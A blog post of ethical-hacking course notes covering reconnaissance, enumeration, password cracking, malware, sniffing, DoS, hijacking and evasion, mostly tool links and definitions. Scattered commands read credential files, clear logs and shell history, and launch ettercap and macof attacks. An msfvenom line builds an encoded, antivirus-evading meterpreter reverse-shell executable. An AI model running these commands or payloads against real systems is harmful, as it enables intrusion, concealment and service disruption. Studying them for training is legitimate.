Featured Post
Ethical Hacking : Notes
- Get link
- Other Apps
Ethical Hacking Notes
Disclaimer:
- This document contains unedited notes and has not been formally proofread.
- The information provided in this document is intended to provide a basic understanding of certain technologies.
- Please exercise caution when visiting or downloading from websites mentioned in this document and verify the safety of the website and software.
- Some websites and software may be flagged as malware by antivirus programs.
- The document is not intended to be a comprehensive guide and should not be relied upon as the sole source of information.
- The document is not a substitute for professional advice or expert analysis and should not be used as such.
- The document does not constitute an endorsement or recommendation of any particular technology, product, or service.
- The reader assumes all responsibility for their use of the information contained in this document and any consequences that may arise.
- The author disclaim any liability for any damages or losses that may result from the use of this document or the information contained therein.
- The author reserve the right to update or change the information contained in this document at any time without prior notice.
- Any attempts to perform penetration testing or ethical hacking on systems or networks should be done with the explicit permission of the system/network owner. Unauthorized access is illegal and can result in serious legal consequences.
- It is important to fully understand the scope of the testing and to only test within that scope. Testing outside the agreed upon scope is considered unauthorized and may result in legal action.
- Any findings or vulnerabilities discovered during testing should be reported to the system/network owner immediately and kept confidential until a fix can be implemented.
- It is recommended to use a separate, dedicated testing environment rather than testing on a live production system to minimize the risk of accidentally causing damage or downtime.
- It is important to take steps to protect your own identity and prevent accidental data leaks or exposure of sensitive information during testing.
- It is also recommended to follow a standard code of ethics for ethical hacking and penetration testing.
Reference : https://www.linkedin.com/learning/
Technology: Security
Become an Ethical Hacker
Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.
Chapter 1 : Introduction to Ethical Hacking: LinkedIn By: Lisa Bock
** attacks types
1. Passive
- Sniffing
- Port scanning
2. Active
- Release malware
- Launch DDoS
** Standards:
- PCI DSS
- HIPAA
- SOX
- GDPR
- COBIT framework
** Burst Attack or DoS
Reconnaissance - gather information about you.
3 Basics for a Org to contain cyber attack
1. Technical controls - Detect & Protect
2. Administrative
3. People
VLANS
NAT - N/w address translation
Spam filters, packet shapers & honey-spots
TOGAF - The Open Group Architecture Framework
ITIL - Information Technology Infrastructure Library
COBIT - Control Objectives for Information and Related Technology
SOX - Sarbanes-Oxley (SOX) act
SOX - section 301 & 404 = Indirectly deal with Information assurance and Data integrity
Penetration testing : can include N/w devices, email, hosts, wireless, applications, and websites.
FISMA - Federal Information Security Management Act
Vulnerability Scanning Tool
1. Tenable
Ethical Hacking
Means -
- what is derived from the information
- what can be planned to devise counter measures
Planned Five Phases approach
- Reconnaissance
- Scanning
- Gaining access
- Maintaining access
- Covering Tracks
******************************************************************************
Chapter 2: Ethical Hacking: Footprinting and Reconnaissance By: Lisa Bock
Finding Information everywhere:-
Public resources - Websites, directories, email, job sites, Social websites.
Google Hacking database:
https://www.exploit-db.com/google-hacking-database
HTTrack Website Copier
https://www.httrack.com/
Montastic is free for open source software
https://www.montastic.com/
StatusOK
Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.
https://github.com/sanathp/statusok
https://www.shodan.io/
Shodan is the world's first search engine for Internet-connected devices.
Email Header look up
https://mxtoolbox.com/
Metagoofil is an information gathering tool designed for extracting metadata of public documents
https://www.kali.org/tools/metagoofil/
FOCA (Fingerprinting Organizations with Collected Archives)
https://github.com/ElevenPaths/FOCA
theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.
https://github.com/laramies/theHarvester
https://www.kali.org/tools/theharvester/
DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.
https://dmarc.org/
The Anti Hacker Alliance™ fights against Hackers
https://anti-hacker-alliance.com/
tracert google.com
pathping google.com
Network Tools: The Trusted Free Online
https://network-tools.com/
dig Command in Linux
https://www.geeksforgeeks.org/dig-command-in-linux-with-examples/
https://toolbox.googleapps.com/apps/main/
https://dnsdumpster.com/
https://who.is/
ip logger : can track geo location using ip logger URL
https://iplogger.org/
******************************************************************************
Chapter 3: Ethical Hacking: Scanning Networks By: Lisa Bock
Ports 1 - 1023
21 FTP
22 SSH
53 Domain Name system
80 HTTP
88 Kerberos
Ports from 1024-49151 are registered
3389 - Remote desktop Protocol (RDP)
Vulnerability Scan
Firewall response in port scanning:
open means listening
Closed means denying
No reply means in stealth mode
Tools in Kali Linux:
Netcat and Nmap
DMitry
Curl
Armitage
Banner Grabbing: is done to get
operating system
Open ports and service running
To Prevent Banner Grabbing:
Mask or disable the web server
Hide file extensions on services
Disable unnecessary service
SSDP: Simple Service Discovery Protocol
https://www.spiceworks.com/free-network-monitoring-management-software/
NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.
https://www.netresec.com/?page=NetworkMiner
FING App : https://www.fing.com/products/fing-app
Net Scan by Nick Circelli
IP Tools: WiFi Analyzer by AmazingByte
Nikto :
Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.
https://www.kali.org/tools/nikto/
Staying anonymous:
1. Use private browsing
2. privacy badger
3. use password manager
4. use duckduck go
5. use VPN
6. temp email
Stay anonymous in Mobile
1. Don't use phone
2. don't use google
3. disable gps
4. use waze
Onion Routing TOR
1. Don't torrent
2. don't install or enable plugins
3. use only https
4. don't open documents
TOR flow network
https://torflow.uncharted.software/
Proxy Chain: Tools
1. Proxy swicher
2. Proxifier
3. Proxy workbench
Kali Linux:
sudo apt-get install tor
sudo apt-get install proxychains
SSH tunnels:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
https://www.putty.org/
***************************************************************************
Chapter 4 : Ethical Hacking: Enumeration By: Malcolm Shore
Enumeration is Identifying -
1. Username
2. System addresses
3. Network resources
4. Shares
5. Other targets
Before Vulnerable testing
- Extract usernames
- Gather host information via null sessions
- port enumeration
- user account enumeration
- special protocol enumeration
Approaches
- Local host enumeration
- remote host enumeration
- internet enumeration
- port and services enumeration
Useful service
Port 53 - DNS Domain Name System
Port 25 - SMTP Simple Mail transfer Protocol
Port 135 - RPC Remote Procedure calls
Port 139 - NetBIOS
Port 161 - SNMP simple network management Protocol
Port 389 - LDAP Lightweight Directory Protocol
Port 445 - SMB Server message Block
┌──(kali㉿kali)-[~]
└─$ echo $UID
┌──(kali㉿kali)-[~]
└─$ cat /etc/passwd |more
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/sudoers
┌──(kali㉿kali)-[~]
└─$ getent group sudo
How to run in root mode from User mode
┌──(kali㉿kali)-[~]
└─$ sudo su
┌──(root㉿kali)-[/home/kali]
└─# echo $UID
0
┌──(root㉿kali)-[/home/kali]
└─# Exit
┌──(kali㉿kali)-[~]
└─$
NetBIOS
NetBIOS name service - port 137 UDP
Datagram Distribution service - PORT 138 UDP
NetBIOS over TCP/IP - PORT 139 TCP
SMB
SAMBA is a linux implementation of SMB
DCE Distributed Computing Environment
RPC Remote Procedure Call
Local-Host Enumeration:
Profiling a Linux Metasploitable 2
$ cat /proc/version
$ cat /etc/*-release
$ cat /proc/cpuinfo
$ df -a
$ df -h
$ cat /etc/shells
List of user names
$ cat /etc/passwd
Password with Hash
$ sudo cat /etc/shadow
$ pinky
$ w
$ who -a
Profiling a windows Host
Download PsTools:- https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
Windows Terminal
Downloads> cd .\PSTools\
Downloads\PSTools> .\PsInfo.exe
Downloads\PSTools> .\PsInfo.exe -d
Downloads\PSTools> .\PsInfo.exe -s
Downloads\PSTools> .\pslist.exe
Downloads\PSTools> .\pslist.exe -t
Downloads\PSTools> .\pslist.exe -x
Downloads\PSTools> .\psloglist.exe -n 10
Downloads\PSTools> .\PsLoggedon.exe
Downloads\PSTools> .\PsService.exe
Downloads\PSTools> .\PsService.exe security Eventsystem
Downloads\PSTools> .\PsService.exe depend Eventsystem
Kali Linux :-
Getting details from metasploitable-2
smbmap -u '' -p '' -H 10.0.2.4 -R
sudo netstat -i
Get UDP open ports only
nmap -sU 10.0.2.4
Get TCP open ports only
nmap -PS 10.0.2.4
SMB from Linux:-
nbtscan
┌──(kali㉿kali)-[~]
└─$ nbtscan -h
┌──(kali㉿kali)-[~]
└─$ sudo nbtscan -v -s : 10.0.2.0/24
─$ sudo nbtscan -rv 10.0.2.0/24
nmap
┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-os-discovery 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-enum-users 10.0.2.4
enum4linux
┌──(kali㉿kali)-[~]
└─$ enum4linux -U 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.0.2.4
rpcclient
┌──(kali㉿kali)-[~]
└─$ rpcclient -h
https://www.mitec.cz/netscan.html
https://www.softperfect.com/products/networkscanner/
https://www.ireasoning.com/mibbrowser.shtml
WMI
Understanding how to enumerate WMI is useful both for offensive and defensive activities.
whatweb
┌──(kali㉿kali)-[~]
└─$ whatweb 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ whatweb 10.0.2.0/24 --no-errors | grep -v Unassigned
nikto
┌──(kali㉿kali)-[~]
└─$ nikto -h 10.0.2.4
zaproxy
sudo apt install zaproxy
https://www.kali.org/tools/zaproxy/
gobuster
https://www.kali.org/tools/gobuster/
Tracing Routes
┌──(kali㉿kali)-[~]
└─$ sudo traceroute -I 67.3.11.1
Enumeration Cloud
AWS has its own CLI (command line input)
NetScanTools Basic Edition
https://www.netscantools.com/nstbasicmain.html
LDAP
https://sourceforge.net/projects/ldapadmin/
Telent
┌──(kali㉿kali)-[~]
└─$ telnet 10.0.2.4
Chapter 5 :Ethical Hacking: Vulnerability Analysis -By: Lisa Bock
Managing Org Risk:
Risk = Threats * Vulnerabilities
Zero-Day Attack
Vulnerabilities found in wild -> Unaware = Public + Vendor
Then after the period Vendor is aware -> Unaware = Public
Vendor released patches -> aware = Public
Assessing Vulnerabilities
Network scanning
2 types
Information systems = DBMS, software
Information technologies = Hardware, n/w devices
How run Vul. scan
Unauthenticated scan = No user/pass, basic config, can miss many vuln.
Authenticated scan = clone environment system, valid user/pass, detailed scan
Lifecycle for Vuln management
Baseline
Assess Vuln = Plan (compliance req.; Tools- Ports cans, n/w scans, web app scans.)
Assess Risk
Remediate = Mitigate the vuln.
Verify = retest
Monitor = continuous monitoring
Threat Modeling
Used to create VM of the entire system along with potential points and a list of possible attacks
Data Breach :
https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/#bysensitivity
Web-based User Feedback System
https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf
Using STRIDE, listed here are some of the threats possible against this system, organized by class of threat.
Analyzing Vulnerabilities
NIST SP 800-30, Page 78
https://www.nist.gov/privacy-framework/nist-sp-800-30
NIST: Common Vulnerability Scoring System Calculator [CVSS]
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
CVE: Common Vulnerabilities and Exposures
Each CVE has id and score is derived from metrics CVSS
Current CVSS Score Distribution For All Vulnerabilities
https://www.cvedetails.com/
https://www.cvedetails.com/vulnerability-list.php?vendor_id=0&product_id=0&version_id=0&page=22&hasexp=0&opdos=0&opec=1&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2022&cweid=0&order=2&trc=2105&sha=3ecb9c2942e59ed03bfff2cd27fb2aa98519a183
Learn Vulnerability scan from Web
https://www.hacker101.com/start-here
https://ctf.hacker101.com/auth/login
https://www.hackerone.com/
Virtual Machine Image :
https://www.osboxes.org/
Kali linux
Commando VM:
https://www.mandiant.com/resources/commando-vm-windows-offensive-distribution
Github link:-
https://github.com/mandiant/commando-vm
Nikto : Built into Kali linux
┌──(kali㉿kali)-[~]
└─$ nslookup scanme.nmap.org
┌──(kali㉿kali)-[~]
└─$ nikto -h 45.33.32.156
Fuzz Testing
A black box method that floods a system with inputs
Kali linux - OWASP ZAP
LAN
Defending the LAN
Spoofing:
Man In The Middle Attack
ARP spoofing
MAC spoofing
Cisco Discovery Protocol Attack
VLAN hopping attack
DHCP attack
Yersinia attack Tool:
https://www.kali.org/tools/yersinia/
┌──(kali㉿kali)-[~]
└─$ sudo yersinia -G
Attacks can be launched from yersinia.
Monitoring Tools:
https://www.nagios.org/
https://www.tenable.com/products/nessus
https://www.gfi.com/
https://sectools.org/
Firewalls and HIDS
Endpoint firewall examples- ZoneAlarm, ESET, and Norton Personal Firewall
Intrusion detection:
Intrusion must learn the system, can monitor the host for suspicious activities
Examples- Symantec endpoint protection, McAfee host intrusion Prevention, Suricata.
https://help.eset.com/eis/15/en-US/
Hack a website Exercise:-
https://hbh.sh/home
Chapter 6: Ethical Hacking: System Hacking, By: Lisa Bock
APT Advanced persistent Threat
NTLM New Technology LAN Manager
Kerberos
PAM Pluggable Authentication Modules
SASL Simple Authentication and Security Layer
Gaining Access:-
SAM Security Account Manager
Random Password Manager:-
https://www.passwordrandom.com/
Dictionary Attack
Brute Force Attack
Hybrid Attack
Password cracking Tools:
L0phtCrack 7.2.0 has been released as an open source project
https://gitlab.com/l0phtcrack/l0phtcrack/-/releases
Ophcrack is a free Windows password cracker based on rainbow tables.
https://ophcrack.sourceforge.io/
John the Ripper
Cain and Abel
Secure Hash Algorithms used for hashing the passwords
Rainbow crack:-
http://project-rainbowcrack.com/
Create the Hash format for password
https://www.fileformat.info/tool/hash.htm
Online Reverse Hash Lookup
http://reverse-hash-lookup.online-domain-tools.com/
http://www.md5.cz/
Escalating Privileges
Horizontal
Vertical
Privilege escalation takes advantage of vulnerability and tries to gain administrator access.
Password Resetting Tool:
https://trinityhome.org/
https://www.password-changer.com/index.html
simda bot free ip scanner
https://checkip.kaspersky.com/
Recognizing Spyware
Categories of Malware
Spyware
Viruses
Worms
Trojans
Rootkits
Adware
Block Third party cookies always
Anti Spyware Tools:
Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.
https://www.safer-networking.org/products/spybot-identity-monitor/
https://www.safer-networking.org/free-download/
Keyloggers:
https://www.elitekeyloggers.com/
Help Your Kids by Watching Their Back
https://www.refog.com/
Objective-see:
non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference
https://objective-see.org/
malwarebytes
https://www.malwarebytes.com/keylogger
Hiding in Plain Sight
Creating Hidden content
desktop> notepad temp.txt:secret.txt
To display hidden content:-
desktop>more < temp.txt:secret.txt
Steganography Tools: these are obsolete
MP3Stego
S-Tools
OpenPuff
Update : Local Security Policy in windows
Local policies -> Audit Policy-> audit account logon events -> enable
Covering Tracks:
For Linx: Metasploit meterpreter > clearev
Open log files stored in /var/log directory
In BackTrack: kwrite /var/log/messages
Erase command history
Export HISTSIZE=0
Open Event Logger and select clear log
Chapter 7: Ethical Hacking: The Complete Malware Analysis Process By: Malcolm Shore
Introduction to Malware
Improve the windows startup service: Regedit: - Then delete unwanted register key - Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs
ROOTKIT
Zeus malware:
Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.
Citadel (malware)
Virus Construction Kit
2 types
GUI interface
Configuration file
SpyEye Builder
FireCrypt
Trojan Development Kit - TDK
Reference: Transcriptase–Light: A Polymorphic Virus Construction Kit
https://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1513&context=etd_projects
MITRE ATT&CK
is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
https://attack.mitre.org/
Malware Detection
IOC Indicator of Compromise
IOA Indicator of Attack
IOC Bucket
is a free community driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way.
IOC Bucket
OASIS OPEN:
https://www.oasis-open.org/
ADS Anomaly Detection System
Sandboxing Malware
Some enterprise products as examples
https://www.sonicwall.com/products/firewalls/
Malware That changes
Polymorphic
Metamorphic
Ransomware
WannaCry
Delivery via Phishing, via port 445 - configured for file sharing
APT Defenses: advanced persistent threat
Targeted cyberattacks logbook
Click on the each marware and get more information
SODIN malware:
Exploits using CVE-2019-2725/9
Dropper installs w32.sodin malware
Privilege escalation using CVE-2018-8453 & gains full system privileges
BlackEnergy 2 & 3: Malware - attacks industrial control workstations
Encrypted Rootkill payload
GreyEnergy Malware
Reverse Engineering Malware
https://zeltser.com/mastering-4-stages-of-malware-analysis/
https://cuckoosandbox.org/
VirusShare.com is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code
https://virusshare.com/about
malware-traffic-analysis
A source for packet capture (pcap) files and malware samples
https://www.malware-traffic-analysis.net/
Automated Malware analysis
Hybrid Analysis
This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.
BlackEnergy /2 /3 - Malware - attacks industrial control workstations
Encrypted Rootkill payload
Help file in Russian
It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.
BlackEnergy 2
Kernel mode driver
Process injection
Privilege escalation based on ms08-025
BlackEnergy 3
2015 Ukraine power grid attacks
Then gave into GreyEnergy Malware
Analyzing Packers
UPX
UPX is a free, portable, extendable, high-performance executable packer for several executable formats.
Ghidra : tools developed by NSA's
A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission
Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock
Sniffing or Packet Analysis
Tools
Wireshark
Npcap
Comes from nmap for windows along with wireshark.
Phases
Gather
Decode
Display
Analyze
Is the traffic normal
TCP flags
Malware Signatures
Traffic in clear text
Router advertisements
OSI Model
Frame
OSI model in wireshark
Active Attacks:
Denial of Service DoS
Buffer overflow
Password attack
Tapping in to Data Stream
2 basic types of ethernet environments
Shared or hub based
Switched network
Wireless
802.11b/g/n act like a hub
IPv4 Vs IPv6
MAC Attacks
MACOF:
┌──(kali㉿kali)-[~]
└─$ sudo macof
Vulnerable protocols
STP = Spanning Tree Protocol
Attacks
DoS using BPDU Flood
CDP = Cisco Discovery Protocol
Attacks
Send bogus CDP to other devices
Flood CDP & cause a DoS
DTP
DHCP
HRSP
ISL
VTP
802.1Q
802.1X
Macof Attack Defense
Use switch port security
Macof Spoofing Defense
Used in Man-in-the-middle attack
Use Filtering trusted IP & MAC address
DHCP
DHCP process
Discover
Offer
Request
Acknowledge
VLAN Access Control List VACL
Access control on the switch not the router
ARP
Ettercap
Tool in Kali Linux
Used in man in the middle attack
┌──(kali㉿kali)-[~]
└─$ ettercap -G
Old websites
AsecuritySite:https://asecuritysite.com/ids
DNS
To prevent DNS attacks
Enable Cache locking
Sniffing Tool and TEchniques
Tools
Linux Tools
Tcpdump
Ettercap
Dsniff
Chapter 9: Ethical Hacking: Social Engineering By: Lisa Bock
Social Engineering Techniques
Phone phishing
Online recon
Dumpster diving
Shoulder surfing
Simple persuasion
Catfishing
Poses as love interest
Lures you into a relationship
Browser
Privacy most important
TOR browser
Extensions or Addons
Auto update enabled
Reputation Risk
Use of social platform
Information Collection
Identification Theft
Report fake account in facebook
Penetration testing with social Engineering
Phishing emails
Dangerous websites
Fake Call
Pentesting with SET - Social Engineering Toolkit
Download the toolkit or use with kali linux
SET - Crafts the bait
Metasploit - creates the exploit
The Social-Engineer Toolkit (SET)
The Social-Engineer Toolkit (SET) - TrustedSec
https://www.trustedsec.com/
Spamhaus
https://www.spamhaus.org/statistics/spammers/
Desktop File shredder File Shredder
https://www.fileshredder.org/
Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore
Understanding DoS
Tools
Digital Attack Map
https://www.digitalattackmap.com/
Attack Types:
DoS
DDoS
Network Based attacks
TCP SYN flood
Smurf (ICMP) flood
UDP flood
ARP flood
DNS reflection
Wireless Attacks
De-authentication
Routing congestion
Application Attacks
HTTP services
FTP service
SIP services
Infrastructure of DoS
Hping3 -h
┌──(kali㉿kali)-[~]
└─$ hping3 -h
HPing3 Cheatsheet ≈ Packet Storm
https://packetstormsecurity.com/files/97414/HPing3-Cheatsheet.html
https://dl.packetstormsecurity.net/papers/general/hping3_cheatsheet_v1.0-ENG.pdf
Hyenae download | SourceForge.net
https://github.com/r-richter/hyenae
Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.
LOIC Approach
https://github.com/NewEraCracker/LOIC
https://sourceforge.net/projects/loic/
Ettercap
┌──(kali㉿kali)-[~]
└─$ ettercap -P list
Ettercap -TQP dos_attack
Ettercap -G
┌──(kali㉿kali)-[~]
└─$ service --status-all | more
ntpdos
Denial of service using NTP servers to amplify attacks
It appears someone is using an attack vector like this to DDOS CloudFlare
https://github.com/vpnguy-zz/ntpdos
GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers
Memcached
Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.
https://memcached.org/
Memcrashed-DDoS-Exploit
This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io
https://github.com/649/Memcrashed-DDoS-Exploit
GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
Wireless DoS
Airmon-ng
https://www.aircrack-ng.org/doku.php?id=airmon-ng
┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng
Application DoS
goldeneye
https://www.kali.org/tools/goldeneye/
GoldenEye is a HTTP DoS Test Tool. This tool can be used to test if a site is susceptible to Deny of Service (DoS) attacks. Is possible to open several parallel connections against a URL to check if the web server can be compromised.
OWASP Top Ten
https://owasp.org/www-project-top-ten/
Ransomware
Cryptolocker Ransomware
Distributed by botnets
Drops randomly generated name
Inserts startup command into registry
Post Encryption
Ransom Message displayed
Countdown timer started
If payment not received, files are deleted
Paying Ransom
Payment of the ransom is made using bitcoins.
Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards.
Once the victim pays the ransom, a transaction ID is provided.
The victim can then enter this into the Cryptolocker program that is running.
The private key is then sent to the victim, and the decryption process begins.
Mitigation Techniques
Mitigation by design
Priority based servicing
Priority Management
Discard low priority
Aggregate based congestion control [ACC]
Egress filtering
Packet inspection
Detect bad packets
Ingress filtering
Malicious packet detection
NEtwork context
Operation Mitigation
IP address verification
Source address spoofing
Real Time detection
Real time traceback
Rate limiting
ACLs
Detecting known malicious threats
Characterizing normal
Metrics to reflect normal boundaries
Detecting traffic anomalies
Repose
is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.
https://repose.atlassian.net/wiki/spaces/REPOSE/overview
Project Shield
Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline
https://projectshield.withgoogle.com/landing
Peershark
https://github.com/pratiknarang/peershark
https://ieeexplore.ieee.org/document/9642767
https://www.ieee-security.org/TC/SPW2014/papers/5103a108.PDF
NIST
Resilient Interdomain Traffic Exchange:
BGP Security and DDoS Mitigation
https://csrc.nist.gov/publications/detail/sp/800-189/final
Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation
39 control plane and BGP security recommendations
26 DDoS mitigation recommendations
12 recommendations for source address validations
7 recommendations for port Filtering
1 recommendations on rate limiting
6 recommendations on flow specification blackholing
IOT Distributed IDS
Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore
Into Session Hijacking
Stateless HTTP
Session IDs
PHP session array
Websocketd
http://websocketd.com/
https://github.com/joewalnes/websocketd
Establishing Man in the Middle
Web proxy
ARP poisoning
Malicious Wifi
Cookie hijacking
Tampermonkey:-
https://www.tampermonkey.net/
https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en
Subterfuge-Framework /Framework for Man-In-The-Middle attacks
https://github.com/Subterfuge-Framework/Subterfuge
ARP poisoning
Cain and Abel
https://sectools.org/tool/cain/
PUTTY
https://www.putty.org/
PuttyRider
Hijack Putty sessions in order to sniff conversation and inject Linux commands.
https://github.com/seastorm/PuttyRider
DNS Hijacking
Cloud hijacking
API Key HIjack
Hijacking the Physical Worlds
Vehicle wiring Diagram
Parrot Drone
UDP 5554- telemetry data
TCP 5555- streaming video
UDP 5556- flight commands
UDP 5559- critical data
Acrylic Wi-Fi Home – WiFi Scanner
https://www.acrylicwifi.com/en/wlan-wifi-wireless-network-software-tools/wlan-scanner-acrylic-wifi-free/
Enhanced Kamkar attack
Telnet connection
Add firewall rule
Laptop application to control drone
Photography Drone
2.4GHz radio control link
XBee telemetry link
5.8GHz streaming video link
Telemetry Channel attacks
Detect all ZigBee station
Delete the mac address and set attackers mac address
Pair victim with attacker
Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore
Firewall
Windows Firewall
Windows Defender Firewall Properties
Public Profile
Inbound connections = Block all connections
Settings-> Customize -> allow unicast response = No {to safe from defense performance mark as NO}
Logging->Customize->
Log Dropped packets = Yes
Log Successful connections = yes
Windows DNS Log Analyser
https://support.moonpoint.com/reviews/software/windows/network/dns/WDLA/
Linux Firewall
iptables
┌──(kali㉿kali)-[~]
└─$ sudo iptables -L -n -v
┌──(kali㉿kali)-[~]
└─$ cat /var/log/kern.log
Networking using GN3
GNS3 : https://www.gns3.com/
All in one:-
https://github.com/GNS3/gns3-gui/releases
Tour of GN3
Basic operation
Routed network
ASA secure enclave
Honeypots
Target to lure attackers
Identify and prosecute
Monitor and analyze
Types of honey pots
Low interaction
High interaction
Honeynets
sinkhole
https://www.honeynet.org/projects/
This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoc students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.
Protection from Intrusion
Blacklist the websites
Whitlist
Just add the sites to be allowed
This is easier than maintaining the blacklist
Snort
Log and Alert output
alert_fast
alert_full
Default file /var/logs/snort/
alert_syslog
Suricata
Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.
Security Onion
Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.
https://securityonionsolutions.com/
Evasion Techniques
Msfvenom
┌──(kali㉿kali)-[~]
└─$ msfvenom --list encoders
Msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=10.0.2.15 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe
Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed
Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.
https://blog.morphisec.com/andromeda-tactics-analyzed
Chapter 13: Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore
Introduction to WEB Servers
Return Code from web servers
200 - processed OK
400 - bad request
403 - unauthorized
404 - not found
500 - internal server error
Tools
http://websocketd.com/
Google QUIC
burpsuite | Kali Linux Tools
https://www.kali.org/tools/burpsuite/
Testing vulnerable website
http://zero.webappsecurity.com/
OWASP WebGoat - Learn the hack - Stop the attack
https://owasp.org/www-project-webgoat/
Fingerprinting
whatweb
┌──(kali㉿kali)-[~]
└─$ whatweb http://zero.webappsecurity.com
http://zero.webappsecurity.com [200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]
┌──(kali㉿kali)-[~]
└─$ whatweb -l | more
Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
https://www.mavensecurity.com/resources/web-security-dojo
Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore
Wi-Fi Networks
Speed Standards
Wireless security
Network key
Internet login
MAC filtering
Encryption- WEP, WPA, and WPA2
Connection -WPS
Signal aspects of wireless
Performance in dBi is against a benchmark
Gain is expressed in units of dBi, decibels isotropic, and the higher the decibels, the more powerful the antenna, and the more reliable the communication is. Sometimes performance will be expressed as dBm, which is pure signal power. dBm are related to milliwatts through the equation dBm equals 10 times log to the 10 milliwatts.
When transmitting, a positive number represents better performance, or gain, from the benchmark, and a negative number means lower performance, or loss. 1,000 milliwatts, or 30 dBm, is rated to be a good transmitter.
